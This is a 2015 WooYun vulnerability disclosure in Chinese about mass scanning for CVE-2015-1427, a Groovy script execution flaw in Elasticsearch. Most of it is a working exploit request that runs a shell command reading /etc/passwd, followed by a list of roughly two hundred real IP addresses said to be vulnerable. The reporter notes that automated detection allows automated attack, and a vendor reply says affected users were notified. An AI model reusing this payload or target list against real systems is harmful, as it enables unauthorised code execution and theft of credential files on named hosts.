乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-15: 细节已通知厂商并且等待厂商处理中 2015-03-18: 厂商已经确认,细节仅向厂商公开 2015-03-28: 细节向核心白帽子及相关领域专家公开 2015-04-07: 细节向普通白帽子公开 2015-04-17: 细节向实习白帽子公开 2015-04-29: 细节向公众公开
3000+集群服务器执行任意命令
看了 WooYun: 我是如何在2小时内组建"5000+集群服务器僵尸网络"的 ,决定针对(CVE-2015-1427)Elasticsearch Groovy 脚本动态执行漏洞对全网进行自动化扫描。全网共检查存在漏洞网站3000+(去重复后)。国内发现存在漏洞IP 197个EXP 如下:
POST IP:9200/_search?pretty{"size":1,"script_fields": {"test#": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}
国内受影响IP:
http://114.80.156.167http://202.105.7.173http://112.126.64.18http://121.40.62.116http://203.195.197.22http://182.92.220.150http://115.28.181.216http://182.92.0.244http://121.199.1.80http://121.41.72.14http://121.41.53.71http://115.28.191.16http://116.55.245.125http://114.215.205.185http://112.124.6.56http://120.24.225.118http://115.29.227.90http://61.154.116.182http://115.29.246.247http://112.126.73.73http://115.236.59.194http://103.31.203.246http://203.195.151.221http://115.29.250.200http://121.40.106.146http://203.195.194.168http://112.124.59.36http://115.29.235.200http://221.234.42.157http://121.41.75.56http://121.41.117.85http://114.215.178.149http://114.215.182.17http://211.151.7.138http://115.28.149.20http://121.41.53.252http://121.199.29.244http://210.34.4.74http://42.62.105.193http://58.215.139.37http://203.80.144.147http://182.92.183.155http://115.29.232.33http://121.42.44.81http://182.92.185.67http://221.122.117.100http://222.46.26.181http://121.42.43.41http://115.29.4.204http://118.192.85.69http://183.131.78.117http://112.124.127.92http://114.119.5.13http://211.149.162.148http://120.27.50.144http://202.38.82.13http://112.124.32.45http://121.40.207.8http://203.195.212.109http://219.223.190.240http://42.121.0.1http://119.254.111.115http://118.126.11.236http://117.135.160.33http://114.119.5.11http://219.223.190.244http://115.28.42.79http://222.128.5.168http://112.126.73.126http://121.42.54.213http://121.199.13.100http://119.29.21.23http://115.159.25.211http://121.201.107.31http://115.29.228.42http://122.144.133.98http://111.1.36.241http://175.102.35.207http://115.29.244.108http://61.174.8.250http://180.150.165.236http://121.40.186.130http://183.136.214.115http://101.69.176.166http://115.159.27.203http://60.194.60.122http://121.199.46.98http://114.112.84.245http://121.42.44.105http://59.175.153.121http://115.28.216.245http://59.175.153.37http://59.50.115.187http://112.124.122.191http://112.124.109.98http://120.27.29.171http://123.57.135.102http://121.42.54.231http://60.173.26.169http://120.24.53.40http://121.40.72.69http://121.199.43.101http://211.147.220.169http://120.27.46.165http://121.40.123.81http://219.239.238.131http://120.24.65.119http://61.175.96.35http://218.25.139.156http://121.40.85.12http://121.41.24.243http://183.63.24.133http://42.62.40.183http://114.215.107.77http://115.29.237.149http://121.197.1.219http://123.57.64.70http://114.80.210.48http://119.29.38.185http://106.39.63.119http://182.254.202.95http://114.215.204.97http://121.42.15.119http://182.254.201.126http://182.92.100.197http://123.162.189.105http://60.12.69.245http://121.40.139.76http://115.29.145.89http://59.175.153.122http://182.92.189.194http://218.244.150.169http://202.136.62.243http://121.42.41.74http://123.57.83.185http://182.18.47.199http://211.157.188.219http://123.57.9.138http://115.28.9.13http://115.29.9.119http://121.41.48.196http://120.92.244.150http://121.41.114.133http://121.41.117.106http://121.40.104.63http://115.28.181.92http://121.42.41.91http://120.24.81.56http://58.68.250.156http://119.90.0.154http://58.210.46.6http://221.122.121.97http://219.232.240.226http://202.104.70.251http://42.62.15.183http://115.29.174.74http://42.62.73.186http://120.27.44.63http://182.92.218.156http://117.121.31.140http://120.132.57.81http://115.238.164.185http://115.29.76.225http://121.42.40.149http://121.41.55.16http://59.42.210.213http://120.132.66.197http://112.124.11.22http://115.28.220.66http://203.195.234.184http://120.132.56.152http://58.23.5.117http://58.23.5.118http://54.223.161.189http://123.57.42.74http://115.29.163.225http://218.244.143.196http://203.195.148.250http://183.131.78.93http://222.87.144.140http://121.40.53.9http://121.42.148.190http://182.254.165.146http://115.29.227.90 http://211.151.7.139 http://218.244.143.196 http://182.92.159.210 http://125.77.199.221http://61.174.9.217http://58.61.38.143http://121.41.52.69http://115.28.157.134http://182.92.238.251http://203.195.151.221 http://123.57.5.118http://182.92.216.104http://54.223.160.171http://124.193.144.140
既然可以自动化验测,当然可以自动化攻击。还请相关单位进行排查
危害等级:高
漏洞Rank:20
确认时间:2015-03-18 14:22
已经根据所述结果对重要用户IP进行比对,分别发给对应的用户进行处置。
暂无